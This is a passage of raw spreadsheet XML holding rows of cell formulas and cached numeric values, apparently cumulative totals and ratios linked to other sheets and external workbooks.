      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'6'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'6'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>60.3866581651468</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]7'!$W$68</f>
        <v>264.5</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]7'!$X$68</f>
        <v>257.219512195122</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]7'!$Y$68</f>
        <v>266.253031784967</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]7'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]7'!$U$68</f>
        <v>48.8095238095238</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]7'!$V$68</f>
        <v>71.0841886608016</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]7'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]7'!$R$68</f>
        <v>82.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]7'!$S$68</f>
        <v>5817.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>1206</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'6'!H14</f>
        <v>14740</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>979283.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>6703.95</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'6'!K14</f>
        <v>37595.832</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1830539.938</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>65896.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]7'!$W$71</f>
        <v>223.049219687875</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]7'!$X$71</f>
        <v>222.185014650481</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]7'!$Y$71</f>
        <v>213.652374108444</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]7'!$T$71</f>
        <v>34.7083333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]7'!$U$71</f>
        <v>42.6607142857143</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]7'!$V$71</f>
        <v>50.0753910068426</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]7'!$Q$71</f>
        <v>8.33</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]7'!$R$71</f>
        <v>71.67</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]7'!$S$71</f>
        <v>4098.17</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'6'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'6'!K15</f>
        <v>1702.096</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>116458.596</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]7'!$W$72</f>
        <v>59.6470588235294</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]7'!$X$72</f>
        <v>65.3112582781457</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]7'!$Y$72</f>
        <v>61.3576254826255</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]7'!$T$72</f>
        <v>35.4166666666667</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]7'!$U$72</f>
        <v>44.9404761904762</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]7'!$V$72</f>
        <v>50.6353861192571</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]7'!$Q$72</f>
        <v>8.50</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]7'!$R$72</f>
        <v>75.50</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]7'!$S$72</f>
        <v>4144.00</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'6'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'6'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]7'!$W$73</f>
        <v>63.4117647058824</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]7'!$X$73</f>
        <v>64.887417218543</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]7'!$Y$73</f>
        <v>62.9515160169674</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]7'!$T$73</f>
        <v>35.4166666666667</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]7'!$U$73</f>
        <v>44.9404761904762</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]7'!$V$73</f>
        <v>52.1959921798631</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]7'!$Q$73</f>
        <v>8.50</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]7'!$R$73</f>
        <v>75.50</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]7'!$S$73</f>
        <v>4271.72</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'6'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'6'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]7'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]7'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]7'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]7'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]7'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]7'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]7'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]7'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]7'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'6'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'6'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]7'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]7'!$X$74</f>
        <v>215.6</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]7'!$Y$74</f>
        <v>222.285944084066</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]7'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]7'!$U$74</f>
        <v>5.95238095238095</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]7'!$V$74</f>
        <v>6.98839198435973</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]7'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]7'!$R$74</f>
        <v>10</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]7'!$S$74</f>
        <v>571.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'6'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'6'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]7'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]7'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]7'!$Y$72</f>
        <v>9.10919540229885e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]7'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]7'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]7'!$V$72</f>
        <v>4.25219941348974e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]7'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]7'!$R$72</f>
        <v>7e-6</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]7'!$S$72</f>
        <v>0.000348</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'6'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'6'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]7'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]7'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]7'!$Y$73</f>
        <v>239.299857780224</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]7'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]7'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]7'!$V$73</f>
        <v>70.6467540078201</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]7'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]7'!$R$73</f>
        <v>7e-6</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]7'!$S$73</f>
        <v>5781.730348</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]7'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]7'!$E$22</f>
        <v>7828</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'6'!H21</f>
        <v>51795</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2161233</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]7'!$I$22</f>
        <v>7450.3</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'6'!K21</f>
        <v>54319.64</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2120773.64</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]7'!$L$22</f>
        <v>80528.67</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>171.337595744681</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]7'!$W$81</f>
        <v>289.375</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]7'!$X$81</f>
        <v>284.989471163146</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]7'!$Y$81</f>
        <v>275.962682033501</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]7'!$T$81</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]7'!$U$81</f>
        <v>53.8487103174603</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]7'!$V$81</f>
        <v>36.4886261811665</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]7'!$Q$81</f>
        <v>8</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]7'!$R$81</f>
        <v>90.4658333333333</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]7'!$S$81</f>
        <v>2986.22916666667</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]7'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]7'!$E$17</f>
        <v>6423</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'6'!H22</f>
        <v>45781</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2076762</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]7'!$I$17</f>
        <v>6935.89</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'6'!K22</f>
        <v>48931.49</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1940392.87</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]7'!$L$17</f>
        <v>186815.862</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>93.407931</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]7'!$W$79</f>
        <v>90.5714285714285</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]7'!$X$79</f>
        <v>98.6781484656912</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]7'!$Y$79</f>
        <v>102.175034064234</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]7'!$T$79</f>
        <v>29.1666666666667</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]7'!$U$79</f>
        <v>52.6483134920635</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]7'!$V$79</f>
        <v>45.5279576680786</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]7'!$Q$79</f>
        <v>7</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]7'!$R$79</f>
        <v>88.4491666666667</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]7'!$S$79</f>
        <v>3726.00805555556</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]7'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]7'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'6'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]7'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'6'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]7'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]7'!$W$80</f>
        <v>74.6675308741999</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]7'!$X$80</f>
        <v>79.7554167220524</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]7'!$Y$80</f>
        <v>79.1466503868625</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]7'!$T$80</f>
        <v>99.9988425925926</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]7'!$U$80</f>
        <v>48.5114087301587</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]7'!$V$80</f>
        <v>32.8244745845552</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]7'!$Q$80</f>
        <v>23.9997222222222</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]7'!$R$80</f>
        <v>81.4991666666667</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]7'!$S$80</f>
        <v>2686.355</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]7'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]7'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'6'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]7'!$I$56</f>
        <v>1749.89</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'6'!K24</f>
        <v>11396.71</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>291223.24</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]7'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]7'!$R$6</f>
        <v>97.1692307692308</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]7'!$S$6</f>
        <v>83.9234449760766</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]7'!$T$6</f>
        <v>86.1065228618888</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]7'!$O$6</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]7'!$P$6</f>
        <v>62.202380952381</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]7'!$Q$6</f>
        <v>52.522238514174</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]7'!$L$6</f>
        <v>16.25</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]7'!$M$6</f>
        <v>104.5</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]7'!$N$6</f>
        <v>4298.42</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]7'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'6'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]7'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'6'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]7'!$R$7</f>
        <v>213.702127659574</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]7'!$S$7</f>
        <v>204.888888888889</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]7'!$T$7</f>
        <v>187.903923849093</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]7'!$O$7</f>
        <v>48.9583333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]7'!$P$7</f>
        <v>46.875</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]7'!$Q$7</f>
        <v>50.1140029325513</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]7'!$L$7</f>
        <v>11.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]7'!$M$7</f>
        <v>78.75</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]7'!$N$7</f>
        <v>4101.33</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'6'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'6'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]7'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]7'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]7'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]7'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]7'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]7'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]7'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]7'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]7'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'6'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'6'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]7'!$W$69</f>
        <v>24.309861373661</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]7'!$X$69</f>
        <v>22.9287791466187</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]7'!$Y$69</f>
        <v>25.34432105898</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]7'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
